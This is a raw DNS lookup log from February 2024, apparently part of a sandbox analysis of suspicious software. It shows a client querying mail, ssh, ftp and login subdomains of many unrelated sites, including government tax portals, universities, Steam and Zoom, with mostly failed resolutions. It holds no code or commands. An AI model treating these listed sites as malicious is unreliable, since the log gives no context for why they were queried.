                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.569701910 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.569701910 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.570594072 CET1.1.1.1192.168.2.60x674bNo error (0)imap.tiktok.com18.214.153.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.570594072 CET1.1.1.1192.168.2.60x674bNo error (0)imap.tiktok.com52.87.107.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.572992086 CET1.1.1.1192.168.2.60xf057Name error (3)mailgate.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.589746952 CET1.1.1.1192.168.2.60x84f6Name error (3)ftp.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.605344057 CET1.1.1.1192.168.2.60x8817Name error (3)pop.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.615685940 CET1.1.1.1192.168.2.60xcc36Name error (3)pop.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.615907907 CET1.1.1.1192.168.2.60x50f2Server failure (2)ftp.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.619406939 CET1.1.1.1192.168.2.60xe741Name error (3)ssh.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.624131918 CET1.1.1.1192.168.2.60xbad3Name error (3)relay.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.624766111 CET1.1.1.1192.168.2.60xb204Name error (3)ssh.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.643229008 CET1.1.1.1192.168.2.60x3f54Name error (3)ssh.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.645433903 CET1.1.1.1192.168.2.60xf8d3Server failure (2)ssh.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.657644987 CET1.1.1.1192.168.2.60xe940No error (0)ww12.chainmine.io084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.657644987 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.657644987 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.659832954 CET1.1.1.1192.168.2.60xfef4Name error (3)imap.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.695164919 CET1.1.1.1192.168.2.60x1054Name error (3)pop.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.731348038 CET1.1.1.1192.168.2.60xb74eName error (3)mailgate.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.731615067 CET1.1.1.1192.168.2.60x43a4Name error (3)imap.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.746490955 CET1.1.1.1192.168.2.60x1e41Name error (3)mail.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.778471947 CET1.1.1.1192.168.2.60x4f6cName error (3)pop.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.783624887 CET1.1.1.1192.168.2.60x1de5Name error (3)pop3.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.785000086 CET1.1.1.1192.168.2.60xe5abName error (3)imap.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.785429001 CET1.1.1.1192.168.2.60x6572Server failure (2)imap.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.785820007 CET1.1.1.1192.168.2.60xeeb8Name error (3)mailgate.netizion.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.802032948 CET1.1.1.1192.168.2.60xb84aName error (3)pop3.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.811518908 CET1.1.1.1192.168.2.60xc542Name error (3)mailgate.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.823633909 CET1.1.1.1192.168.2.60xfaeaName error (3)relay.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.839723110 CET1.1.1.1192.168.2.60x54b8Name error (3)relay.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.840358973 CET1.1.1.1192.168.2.60xa91dName error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.840372086 CET1.1.1.1192.168.2.60xa91dName error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850027084 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850027084 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850092888 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.850092888 CET1.1.1.1192.168.2.60xf2efNo error (0)www.yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.892880917 CET1.1.1.1192.168.2.60xc41aName error (3)pop.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.892893076 CET1.1.1.1192.168.2.60xc41aName error (3)pop.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.893054962 CET1.1.1.1192.168.2.60x5f6cName error (3)ssh.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.909095049 CET1.1.1.1192.168.2.60x3e26Name error (3)pop.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.948784113 CET1.1.1.1192.168.2.60x5f6cName error (3)ssh.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.975383043 CET1.1.1.1192.168.2.60xc093No error (0)adf.ly172.66.40.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.975383043 CET1.1.1.1192.168.2.60xc093No error (0)adf.ly172.66.43.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.978694916 CET1.1.1.1192.168.2.60x78edName error (3)ftp.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.978853941 CET1.1.1.1192.168.2.60x78edName error (3)ftp.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.993202925 CET1.1.1.1192.168.2.60xf239Name error (3)ssh.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.010173082 CET1.1.1.1192.168.2.60x1c76Name error (3)pop3.pan.baidu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.029520035 CET1.1.1.1192.168.2.60x7e69Name error (3)vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.041012049 CET1.1.1.1192.168.2.60xc131Name error (3)imap.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.041496992 CET1.1.1.1192.168.2.60xcd8fName error (3)pop3.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.062663078 CET1.1.1.1192.168.2.60xbe3dServer failure (2)imap.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.066553116 CET1.1.1.1192.168.2.60x4667Name error (3)relay.naukrigulf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.071351051 CET1.1.1.1192.168.2.60xd677Name error (3)ssh.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.071422100 CET1.1.1.1192.168.2.60xd677Name error (3)ssh.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.072372913 CET1.1.1.1192.168.2.60x6718Name error (3)pop3.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.074461937 CET1.1.1.1192.168.2.60x4306Name error (3)relay.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.076286077 CET1.1.1.1192.168.2.60xfa4cName error (3)pop3.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.078516960 CET1.1.1.1192.168.2.60x2a74Name error (3)pop3.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.080838919 CET1.1.1.1192.168.2.60x8091Name error (3)mailgate.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.082873106 CET1.1.1.1192.168.2.60xbc6dName error (3)mailgate.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.088479996 CET1.1.1.1192.168.2.60x97bName error (3)ssh.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.088745117 CET1.1.1.1192.168.2.60x97bName error (3)ssh.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.124259949 CET1.1.1.1192.168.2.60xce01Server failure (2)pop.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.133424997 CET1.1.1.1192.168.2.60x587fName error (3)relay.netizion.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.173193932 CET1.1.1.1192.168.2.60x4641Server failure (2)sii.ittlahuac.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.173229933 CET1.1.1.1192.168.2.60x4641Server failure (2)sii.ittlahuac.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.173240900 CET1.1.1.1192.168.2.60x4641Server failure (2)sii.ittlahuac.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.173295021 CET1.1.1.1192.168.2.60x4641Server failure (2)sii.ittlahuac.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.189553022 CET1.1.1.1192.168.2.60x55a9Name error (3)pop3.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.189587116 CET1.1.1.1192.168.2.60x55a9Name error (3)pop3.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.249051094 CET1.1.1.1192.168.2.60x17ddName error (3)mailgate.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.281646013 CET1.1.1.1192.168.2.60x20e5Name error (3)pop.servicossociais.caixa.gov.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.318553925 CET1.1.1.1192.168.2.60xb223No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.318595886 CET1.1.1.1192.168.2.60xb223No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.677500010 CET1.1.1.1192.168.2.60x15Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.677510977 CET1.1.1.1192.168.2.60x15Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.677520990 CET1.1.1.1192.168.2.60x15Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:55.677541971 CET1.1.1.1192.168.2.60x15Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529789925 CET1.1.1.1192.168.2.60x2a74Name error (3)pop3.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529820919 CET1.1.1.1192.168.2.60xc093No error (0)adf.ly172.66.43.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529820919 CET1.1.1.1192.168.2.60xc093No error (0)adf.ly172.66.40.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529838085 CET1.1.1.1192.168.2.60xfa4cName error (3)pop3.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529855967 CET1.1.1.1192.168.2.60x17ddName error (3)mailgate.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529871941 CET1.1.1.1192.168.2.60x587fName error (3)relay.netizion.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529898882 CET1.1.1.1192.168.2.60x20e5Name error (3)pop.servicossociais.caixa.gov.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529916048 CET1.1.1.1192.168.2.60xbc6dName error (3)mailgate.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529957056 CET1.1.1.1192.168.2.60x4306Name error (3)relay.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529975891 CET1.1.1.1192.168.2.60x55a9Name error (3)pop3.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.529995918 CET1.1.1.1192.168.2.60x15Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.530009985 CET1.1.1.1192.168.2.60x97bName error (3)ssh.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.530075073 CET1.1.1.1192.168.2.60x8091Name error (3)mailgate.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.530318022 CET1.1.1.1192.168.2.60x4641Server failure (2)sii.ittlahuac.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.568399906 CET1.1.1.1192.168.2.60x1c55Name error (3)mail.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.580116987 CET1.1.1.1192.168.2.60xd127Name error (3)imap.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.699709892 CET1.1.1.1192.168.2.60xce01Server failure (2)pop.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.850415945 CET1.1.1.1192.168.2.60xec17Name error (3)ssh.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.946433067 CET1.1.1.1192.168.2.60xb223No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.965298891 CET1.1.1.1192.168.2.60x3b25Name error (3)mailgate.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.968504906 CET1.1.1.1192.168.2.60x9218Server failure (2)smtp.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.968738079 CET1.1.1.1192.168.2.60x894bName error (3)mail.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.000310898 CET1.1.1.1192.168.2.60xde6dName error (3)imap.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.016995907 CET1.1.1.1192.168.2.60xa6bfServer failure (2)imap.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.045872927 CET1.1.1.1192.168.2.60x7d9fName error (3)pop3.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.052141905 CET1.1.1.1192.168.2.60xd14bName error (3)mail.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.072016954 CET1.1.1.1192.168.2.60x9b9cName error (3)pop.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.082004070 CET1.1.1.1192.168.2.60x213dName error (3)mailgate.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.150851011 CET1.1.1.1192.168.2.60x7204Name error (3)relay.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.322952032 CET1.1.1.1192.168.2.60xbf4bName error (3)etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.349749088 CET1.1.1.1192.168.2.60xdccaName error (3)ftp.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:02.772130013 CET1.1.1.1192.168.2.60x5b19Name error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.858575106 CET1.1.1.1192.168.2.60xb2a3Name error (3)mail.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.861753941 CET1.1.1.1192.168.2.60xdd3bName error (3)pop.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:06.872395992 CET1.1.1.1192.168.2.60xd3aeName error (3)ftp.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:12.148288965 CET1.1.1.1192.168.2.60xe0ffNo error (0)steamcommunity.com23.4.32.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.572243929 CET1.1.1.1192.168.2.60xd553No error (0)steamcommunity.com23.4.32.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.574698925 CET1.1.1.1192.168.2.60xa539Name error (3)ftp.steamcommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.581820965 CET1.1.1.1192.168.2.60xc914Name error (3)mailgate.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.582525015 CET1.1.1.1192.168.2.60xc441Name error (3)mail.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.583523035 CET1.1.1.1192.168.2.60x91eeName error (3)pop.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.589349031 CET1.1.1.1192.168.2.60x9c55Name error (3)mail.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.589711905 CET1.1.1.1192.168.2.60xfa65Name error (3)ftp.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)ucv.blackboard.comlearn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com44.195.133.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com54.205.118.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com44.194.231.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com54.158.51.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.594501972 CET1.1.1.1192.168.2.60x4002No error (0)learn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.com52.6.30.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.598916054 CET1.1.1.1192.168.2.60xaecfNo error (0)milogin.michigan.govmilogin.michigan.gov.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.602750063 CET1.1.1.1192.168.2.60xbe47No error (0)store.steampowered.com23.46.200.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.615004063 CET1.1.1.1192.168.2.60x46d0No error (0)app.plex.tv104.18.41.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.615004063 CET1.1.1.1192.168.2.60x46d0No error (0)app.plex.tv172.64.146.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.619177103 CET1.1.1.1192.168.2.60x4dd5Name error (3)ftp.gitam.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.620156050 CET1.1.1.1192.168.2.60x677No error (0)us04web.zoom.us170.114.52.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.628770113 CET1.1.1.1192.168.2.60x2411Server failure (2)smtp.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.633411884 CET1.1.1.1192.168.2.60x8c5bNo error (0)gitam.zoom.uswww.zoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.633411884 CET1.1.1.1192.168.2.60x8c5bNo error (0)www.zoom.uszoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.633411884 CET1.1.1.1192.168.2.60x8c5bNo error (0)zoom.us170.114.52.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634346008 CET1.1.1.1192.168.2.60xb86fName error (3)mail.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.636631966 CET1.1.1.1192.168.2.60xba3eName error (3)tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.650799990 CET1.1.1.1192.168.2.60x12bcName error (3)ftp.milogin.michigan.govnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654329062 CET1.1.1.1192.168.2.60x1a10No error (0)pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
